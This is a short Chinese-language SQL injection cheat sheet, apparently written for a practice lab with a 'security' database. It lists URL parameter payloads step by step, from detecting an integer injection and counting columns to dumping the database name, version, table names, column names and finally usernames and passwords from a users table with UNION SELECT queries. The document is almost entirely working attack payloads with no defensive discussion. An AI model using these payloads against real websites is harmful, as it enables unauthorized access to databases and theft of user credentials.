一、判断注入类型:
?id=1
?id=1’
?id=’
//不是字符型注入
?id=1 and 1
?id=1 and 1=2
?id=1 or 1
?id=1 or 1=2
?id=1 or 1#
?id=1 or 1–
//整型注入,有limit的限制,注释符被过滤
二、猜解字段数和回显位
?id=1 union select 1
?id=1 union select 1,2
?id=1 union select 1,2,3
?id=0 union select 1,2,3
三、爆库
?id=0 union select 1,database(),user()
?id=0 union select 1,@@version,@@basedir
或者:
?id=0 union select 1,(select group_concat(database(),user(),version(),@@basedir)),3
四、爆表
?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),2
或者:
?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’
五、爆字段
?id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),3
或者
?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273
六、爆字段值
?id=0 union select 1,(select group_concat(concat_ws(char(32,58,32),id,username,password)) from users),3
